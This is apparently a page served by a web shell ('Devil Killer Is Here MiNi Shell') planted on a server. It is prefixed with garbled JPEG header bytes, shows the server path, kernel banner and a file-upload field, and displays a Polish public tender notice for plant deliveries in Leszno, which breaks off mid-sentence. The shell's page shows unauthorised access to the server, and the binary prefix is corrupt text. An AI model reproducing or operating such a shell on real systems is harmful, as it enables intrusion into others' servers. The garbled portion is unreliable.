JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241015/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241015/0054642401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa materiału roślinnego do obsadzenia kwietników na terenach zieleni miejskiej w Lesznie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKI ZAKŁAD ZIELENI W LESZNIE SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 382259957</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cypriana Kamila Norwida 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Leszno</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@mzz.leszno.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">mzz.leszno.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> konserwacja i budowa terenów zielonych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa materiału roślinnego do obsadzenia kwietników na terenach zieleni miejskiej w Lesznie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6c8aac8e-22d8-41f8-b085-4a8251db7975</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00546424</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00058775/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Dostawa sezonowych roślin rabatowych dla Miejskiego Zakładu Zieleni w Lesznie Sp. z o. o.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/998293 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/998293</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Zamawiający, zgodnie z § 11 ust. 2<br/>Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz<br/>wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych<br/>oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:<br/>a) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja,<br/>jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10 0.,<br/>d) włączona obsługa JavaScript,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8,<br/>g) Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu<br/>lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>2. Występuje limit objętości plików lub spakowanych folderów do ilości 10 plików lub spakowanych folderów przy maksymalnej<br/>sumarycznej wielkości 500 MB.<br/>3. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem<br/>ogłoszenia (BZP, TED lub ID postępowania).<br/>4. Zgodnie z art. 20 ust. 1 ustawy Pzp postępowanie o udzielenie zamówienia, z zastrzeżeniem wyjątków przewidzianych w ustawie<br/>Pzp, prowadzi się pisemnie.<br/>5. Zgodnie z art. 61 ust. 1 Pzp postępowaniu komunikacja i wymiana informacji oraz oferty, dokumenty, oświadczenia, zapytania do<br/>treści SWZ, wyjaśnienia i inne informacje dotyczące postępowania składane są przez Wykonawcę wyłącznie za pośrednictwem<br/>platformy, na której prowadzone jest postępowanie. Złożenie oferty, dokumentów i oświadczeń, zapytań do treści SWZ, wyjaśnień i<br/>innych informacji w inny sposób, z pominięciem przekazania ich za pośrednictwem platformy zakupowej uważa się za nieskuteczne.<br/>6. Zamawiający nie udziela ustnych informacji dotyczących postępowania, w szczególności dotyczących ogłoszenia, treści SWZ i<br/>ofert.<br/>7. Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z Instrukcją korzystania z<br/>platformazakupowa.pl, w szczególności za sytuację, gdy zamawiający zapozna się z treścią oferty przed upływem terminu składania<br/>ofert (np. złożenie oferty w zakładce<br/>„Wyślij wiadomość do zamawiającego”).<br/>Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym<br/>postępowaniu ponieważ nie został spełniony obowiązek narzucony w art. 221 Pzp.<br/>8. Postępowanie, w tym korespondencja w postępowaniu prowadzona jest w języku polskim. Oznacza to, że wszelka<br/>korespondencja, oferta, oświadczenia oraz każdy dokument złożony wraz z ofertą sporządzony w języku obcym winien być złożony<br/>wraz z tłumaczeniem na język polski.<br/>9. W przypadku podmiotów wspólnych wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem (liderem).<br/>10. W formularzu ofertowym wykonawca poda adres poczty elektronicznej, na który będzie wysyłana korespondencja.<br/>11. W sprawach technicznych związanych z obsługą platformy należy korzystać z pomocy Centrum Wsparcia Klienta, które udzieli<br/>wszelkich informacji związanych z procesem składania ofert, rejestracji czy innych aspektów technicznych platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej &#34;RODO&#34;, informujemy, że:<br/>1. administratorem Pani/Pana danych osobowych jest Miejski Zakład Zieleni w Lesznie Sp. z o.o. z siedzibą w Lesznie przy ul.<br/>Cypriana Kamila Norwida 4, 64-100 Leszno, (dalej: Administrator)<br/>2. Dane kontaktowe Administratora: adres korespondencyjny – siedziba Administratora lub telefonicznie: 65 529 93 67, e-mail:<br/>sekretariat@mzz.leszno.pl.<br/>3. Dane kontaktowe inspektora ochrony danych: Inspektor Ochrony Danych, Miejski Zakład Zieleni w Lesznie Sp. z o.o. z siedzibą w<br/>Lesznie przy ul. Cypriana Kamila Norwida 4, 64-100 Leszno, e-mail: iodo@mzz.leszno.pl;<br/>4. Pani/Pana dane osobowe przetwarzane będą na podstawie:<br/>a) art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego,<br/>b) art. 6 ust. 1 lit. b RODO w celu realizacji umowy, jeżeli oferta będzie najkorzystniejsza.<br/>5. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ust. 1 i 2 - ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych, dalej &#34;Ustawa PZP&#34; oraz<br/>firma informatyczna świadcząca usługi IT dla Miejskiego Zakładu Zieleni w Lesznie Sp. z o.o.;<br/>6. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 Ustawy PZP przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania umowy przekracza 4 lata, okres przechowywania obejmuje<br/>cały czas obowiązywania umowy w sprawie zamówienia publicznego;<br/>7. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z Ustawy PZP;<br/>8. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>9. posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>10. nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MZZ-361-15/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa materiału roślinnego do obsadzenia kwietników na terenach zieleni miejskiej w<br/>Lesznie. Opis przedmiotu zamówienia, z podziałem na zadania, określenie asortymentu i zakresu ilościowego zamówienia,<br/>jak również wymagania jakościowe znajdują się w Załączniku nr 1 do SWZ – Szczegółowy opis przedmiotu zamówienia.<br/>Obowiązkiem Wykonawcy w ramach wykonania przedmiotowych dostaw będzie wykonanie wszystkich poniższych<br/>czynności składających się na przedmiotowe zadania:<br/>Zadanie I - Dostawa materiału roślinnego wraz z rozładunkiem do wiosennych i jesiennych obsadzeń kwietników przez<br/>Zamawiającego.<br/>Zadanie II - Odbiór, Obsadzenie, pielęgnacja wież, donic oraz skrzynek kwiatowych wraz z dostawą i rozładunkiem w<br/>miejsce wskazane przez Zamawiającego.<br/>2. Przedmiot zamówienia dostarczany będzie partiami, transportem Wykonawcy, na jego koszt i ryzyko.<br/>3. Wykonawca zobowiązany jest do zapewnienia dostawy materiału roślinnego o odpowiedniej wielkości<br/>i wyglądzie charakterystycznym dla tego okresu kwitnienia. Dostarczony materiał roślinny musi odpowiadać wymaganiom<br/>określonym przez Zamawiającego.<br/>4. Zamawiający każdorazowo w zapotrzebowaniu określi czas dostawy (godziny poranne) i miejsce dostawy, do którego<br/>Wykonawca zobowiązany będzie dostarczyć materiał roślinny swoim transportem, na swój koszt.<br/>5. O zapotrzebowaniu na materiał roślinny Zamawiający każdorazowo poinformuje Wykonawcę za pomocą faksu lub drogą<br/>elektroniczną.<br/>6. Materiał roślinny powinien być dostarczany zgodnie z zapotrzebowaniem do siedziby Miejskiego Zakładu Zieleni w<br/>Lesznie sp. z o. o. przy ul. Cypriana Kamila Norwida 4 w Lesznie w całości zgodnie z zamówieniem poszczególnej dostawy.<br/>7. Zamawiający w obecności Wykonawcy dokona kwalifikacji materiału roślinnego i w przypadku stwierdzenia przez<br/>Zamawiającego złej jakości dostarczonego towaru, fakt ten zostanie odnotowany w sporządzonym protokole, w którym<br/>zostanie wskazany rodzaj, zakres oraz termin na usunięcie stwierdzonych<br/>wad. Protokół ten stanowić będzie wezwanie Zamawiającego skierowane do Wykonawcy o wymianę dostarczonej partii<br/>towaru. W takim przypadku Wykonawca będzie zobowiązany dokonać wymiany na własny koszt.<br/>8. Rozliczenia między Zamawiającym a Wykonawcą będą dokonywane na podstawie faktury wystawionej po każdej<br/>zrealizowanej dostawie. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03121100-6 - Żywe rośliny, bulwy, korzenie, sadzonki i rozsady</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">03110000-5 - Rośliny uprawne, produkty warzywnictwa i ogrodnictwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający w zakresie zadania opisanego w pkt 1 niniejszego rozdziału przewiduje usługi, o których mowa w tym punkcie w ramach zadania podstawowego oraz zamówienia w ramach prawa opcji, zgodnie z art. 441 ustawy Pzp.<br/>2. Wykonawca jest obowiązany, po uprzednim otrzymaniu od Zamawiającego pisemnego zawiadomienia, dostarczyć materiał roślinny objęty prawem opcji w liczbie wskazanej w Załączniku nr 1 do SWZ (Szczegółowy opis przedmiotu zamówienia). Skorzystanie z prawa opcji nie wymaga zawarcia aneksu do umowy.<br/>3. Zamawiający może skorzystać z prawa opcji nie później niż w terminie do dnia 31.07.2025 r. w przypadku dostawy wiosennej i nie później niż w terminie do dnia 31.12.2025 r. w przypadku dostawy jesiennej.<br/>4. Zamawiający nie ma obowiązku skorzystania z prawa opcji. Zamawiający może skorzystać z opcji tylko częściowo. Wykonawcy nie przysługują z tego tytułu żadne roszczenia.<br/>5. Zamawiający może skorzystać z opcji stopniowo, składając Wykonawcy oświadczenia w różnych terminach, jednak nie przekraczających terminu wskazanego w ust. 2 aż do osiągnięcia maksymalnego zakresu zamówienia tj. 28 950 sztuk roślin w ramach dostawy wiosennej i 13 300 sztuk roślin w ramach dostawy jesiennej objętych prawem opcji.<br/>6. Postanowienia umowy stosuje się odpowiednio do przedmiotu zamówienia objętego prawem opcji.<br/>7. Cena jednostkowa materiału roślinnego objętego prawem opcji będzie taka sama jak dla zamówienia podstawowego.<br/>8. Warunki dostawy materiału roślinnego objętego prawem opcji oraz warunki świadczenia przez Wykonawcę usług zawartych w ich cenie jednostkowej są takie same, jak w zamówieniu podstawowym. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Najkorzystniejszą ofertą, będzie oferta, która przedstawia najkorzystniejszy bilans kryteriów oceny ofert, odnoszących się do przedmiotu zamówienia.<br/>Zamawiający dokona wyboru oferty najkorzystniejszej w oparciu o wskazane w SWZ kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny, kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostaw - zadanie I</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1. Nie podlegają wykluczeniu z postępowania na podstawie art. 108 ust. 1 Pzp.<br/>2. Zamawiający przewiduje wykluczenia Wykonawcy na podstawie art. 109 ust. 1 pkt 4), 5), 7), 8), 9) oraz pkt 10) ustawy<br/>Pzp.<br/>3. Zamawiający żąda wykazania braku podstaw do wykluczenia dla podwykonawców.<br/>4. Zamawiający zbada czy wobec podmiotu udostępniającego zasoby nie zachodzą podstawy wykluczenia, o których mowa<br/>w art. 108 ust. 1 ustawy.<br/>5. Zamawiający może wykluczyć Wykonawcę na każdym etapie postępowania o udzielenie zamówienia.<br/>6. Wykluczenie Wykonawcy następuje zgodnie z art. 111 Pzp. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">- Oświadczenie Wykonawcy<br/>na podstawie art. 125 ust. 1 ustawy Pzp – wg Załącznika nr 4 do SWZ<br/>- Oświadczenie podmiotu udostępniającego zasoby na podstawie art. 125 ust. 1 i 5 Pzp– wg Załącznika nr 9 do SWZ – jeżeli<br/>dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy na podstawie art. 125 ust. 1 Pzp– wg Załącznika nr 4 do SWZ.<br/>Oświadczenie , o którym mowa powyżej stanowi dowód potwierdzający brak podstaw do wykluczenia oraz spełnienie warunków na<br/>dzień składania ofert, tymczasowo zastępujący przez Zamawiającego podmiotowe środki dowodowe, wskazane w SWZ.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców Oświadczenie,<br/>o którym mowa w ustępie powyżej składa każdy z Wykonawców.<br/>- Zobowiązanie podmiotu udostępniającego zasoby - wg Załącznika nr 6 do SWZ – jeżeli dotyczy.<br/>- Oświadczenie podmiotu udostępniającego zasoby na podstawie art. 125 ust. 1 i 5 Pzp– wg Załącznika nr 9 do SWZ -jeżeli dotyczy</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą 